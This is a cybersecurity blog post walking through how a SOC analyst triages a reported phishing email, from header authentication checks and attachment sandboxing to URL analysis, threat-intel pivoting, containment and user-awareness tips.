top of page
Search

Inside the Mind of a SOC Analyst: A Deep Dive into Phishing Email Analysis

  • Writer: Akshay Jain
    Akshay Jain
  • Jul 7
  • 3 min read

Despite decades of awareness campaigns, phishing continues to reign supreme as the no. 1 initial access vector in cyberattacks, whether it’s ransomware outbreaks, business email compromise (BEC), or nation-state espionage.

But behind every blocked or ignored phishing email lies a team of blue defenders - Security Operations Center (SOC) analysts, tirelessly inspecting headers, payloads, links, and behaviors to distinguish harmless spam from high-impact threats.

In this blog, we’ll walk you through the exact process a SOC analyst follows for phishing analysis, step-by-step. You’ll see technical breakdowns, real-world examples, detection rules, and blue team workflows all designed to fortify your defenses and illuminate the hidden war happening in your inbox.

Phishing Email
Phishing Email

What Does a Phishing Email Look Like?

Let’s look at a sample phishing email reported by a user to their internal security team:

Subject: Urgent Invoice – Action Required  
From: invoice@company-invoicing.com  
To: jane.doe@corporate.com  
Date: Mon, 10 June 2024 08:13:25 -0500  
Attachment: invoice_10882.htm

Phase 1: Header Analysis – Who Really Sent This?

The first step in the analysis is to review the email headers. These contain vital metadata such as source IP, authentication results, and delivery paths.


Key Header Fields to Analyze:

  1. Return-Path vs. From

From: invoice@company-invoicing.com  
Return-Path: spammer@badvilla.ru

  1. SPF, DKIM, and DMARC Results

Authentication-Results:
 spf=fail smtp.mailfrom=badvilla.ru
 dkim=none
 dmarc=fail

Failed checks = high confidence in spoofing.


  1. Received Chains

Received: from [185.250.148.22] (unknown [185.250.148.22])
GeoIP lookup shows origin from a known spam node in Russia.

Phase 2: Attachment or Link Inspection

The user-reported email contains a suspicious .htm file - a common phishing tactic used to bypass attachment filters.


Step 1: Sandbox or Detonation

Tools:

  • Cuckoo Sandbox

  • ANY.RUN

  • Joe Sandbox

Behavior observed:

  • File opens a fake Microsoft login page.

  • JavaScript captures the victim’s credentials using fetch() to a C2


Step 2: Static Analysis

  • Deobfuscation of embedded JS in the .htm file. In many cases it might reveal that it is a credential harvesting email via HTML smuggling, often undetected by email gateways.


Phase 3: URL Analysis and IOC Hunting


Extract URLs

  • From the HTML or email body, extract the URL to analyze it further

  • Use tools like:

    • urlscan.io

    • VirusTotal

    • Hybrid Analysis


Phase 4: Correlation with Threat Intel

  • SOC analysts pivot to CTI sources like:

    • MISP or OpenCTI

    • Threat feeds (AlienVault OTX, Abuse.ch)

    • Past incident cases

to check if the IP addresses or URLs or other indicators have been seen before in any campaigns


Blue Team Workflow: Phishing Email Analysis Process

Step-by-Step SOC Workflow

  • Alert triggered via email filter or user report.

  • Header review → Check SPF, DKIM, DMARC, Return-Path.

  • Attachment sandboxed → Check for credential harvesting or malware.

  • URLs analyzed → Cross-check with threat intel.

  • Extract IOCs → IPs, hashes, domains.

  • Pivot in SIEM:

    • Any other users who clicked?

    • Similar sender seen before?

  • Containment:

    • Block domain/IP via proxy or firewall.

    • Add email subject/hash to spam rules.

  • Response:

    • Notify affected users.

    • Update detection rules.

  • Documentation & RCA in ticketing platform or SOAR.


Prevention & Hardening Tips

  • Block .htm, .html, and .iso files in email attachments.

  • Enforce SPF, DKIM, and DMARC at reject policy.

  • Use sandbox-based email security tools (e.g., Proofpoint, FireEye EX).

  • Train users to report phishing via a one-click button.

  • Implement browser isolation for links from external emails.

  • Enable MFA to minimize impact of stolen credentials.


Bonus: Red Flags for Non-Technical Users

Help your employees spot phishing emails:

  • Unusual sender domain (e.g., m1crosoft.com)

  • Generic greeting: “Dear Customer”

  • Urgent tone: “Account will be disabled!”

  • Unexpected attachments

  • Slightly off URLs (hover to check)


Phishing emails may appear harmless, but they are the first domino in devastating cyberattacks. SOC analysts play a critical role in analyzing, detecting, and containing these threats with precision.

By dissecting headers, decoding payloads, analyzing URLs, and correlating IOCs, blue teams can not only stop the attack but also learn from it, adapt, and build a resilient defense.


Stay curious. Stay secure. 🚀


Note: Feel free to drop your thoughts in the comments below, whether it's feedback, a topic you'd love to see covered, or just to say hi! Don’t forget to join the forum for more engaging discussions and stay updated with the latest blog posts. Let’s keep the conversation going and make cybersecurity a community effort!


-AJ

Comments

Rated 0 out of 5 stars.
No ratings yet
Add a rating
bottom of page